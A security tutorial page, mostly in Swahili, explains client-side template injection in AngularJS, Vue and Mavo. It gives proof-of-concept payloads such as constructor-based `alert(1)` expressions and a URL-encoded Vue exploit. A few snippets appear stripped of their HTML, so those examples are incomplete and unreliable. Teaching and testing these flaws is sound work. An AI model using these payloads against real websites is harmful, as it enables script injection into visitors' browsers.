# Client Side Template Injection (CSTI)
{{#include ../banners/hacktricks-training.md}}
## Summary
Ni kama [**Server Side Template Injection**](ssti-server-side-template-injection/index.html) lakini katika **mteja**. **SSTI** inaweza kukuruhusu **kutekeleza msimbo** kwenye seva ya mbali, **CSTI** inaweza kukuruhusu **kutekeleza msimbo wa JavaScript** wa kiholela katika kivinjari cha mwathirika.
**Kujaribu** udhaifu huu ni **kama** ilivyo katika kesi ya **SSTI**, mfasiri anatarajia **kigezo** na atakitekeleza. Kwa mfano, kwa payload kama `{{ 7-7 }}`, ikiwa programu ina **udhaifu** utaona `0`, na ikiwa sivyo, utaona asili: `{{ 7-7 }}`
## AngularJS
AngularJS ni mfumo maarufu wa JavaScript unaotumika sana ambao unawasiliana na HTML kupitia sifa zinazojulikana kama maagizo, moja maarufu ikiwa **`ng-app`**. Agizo hili linaruhusu AngularJS kushughulikia maudhui ya HTML, na kuwezesha utekelezaji wa maelekezo ya JavaScript ndani ya mabano mawili ya curly.
Katika hali ambapo input ya mtumiaji inaingizwa kwa njia ya kidinari katika mwili wa HTML ulio na alama ya `ng-app`, inawezekana kutekeleza msimbo wa JavaScript wa kiholela. Hii inaweza kufanywa kwa kutumia sintaksia ya AngularJS ndani ya input. Hapa chini kuna mifano inayoonyesha jinsi msimbo wa JavaScript unaweza kutekelezwa:
```javascript
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
```
Unaweza kupata mfano wa **msingi mtandaoni** wa udhaifu katika **AngularJS** katika [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) na katika [**Burp Suite Academy**](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)
> [!CAUTION] > [**Angular 1.6 iliondoa sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html) hivyo kuanzia toleo hili payload kama `{{constructor.constructor('alert(1)')()}}` au `` inapaswa kufanya kazi.
## VueJS
Unaweza kupata utekelezaji wa **Vue** ulio na udhaifu katika [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\
Payload inayofanya kazi: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`]()
Na **msimbo wa chanzo** wa mfano ulio na udhaifu hapa: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
```html
">
aaa
```
A really good post on CSTI in VUE can be found in [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
### **V3**
```
{{_openBlock.constructor('alert(1)')()}}
```
Mwandiko: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
### **V2**
```
{{constructor.constructor('alert(1)')()}}
```
Credit: [Mario Heiderich](https://twitter.com/cure53berlin)
**Angalia zaidi VUE payloads katika** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected)
## Mavo
Payload:
```
[7*7]
[(1,alert)(1)]
{{top.alert(1)}}
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
test
lolxself.alert('lol')lolx
test
[self.alert(1)mod1]
```
**Zaidi ya payloads katika** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)
## **Orodha ya Kugundua Brute-Force**
{{#ref}}
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt
{{#endref}}
{{#include ../banners/hacktricks-training.md}}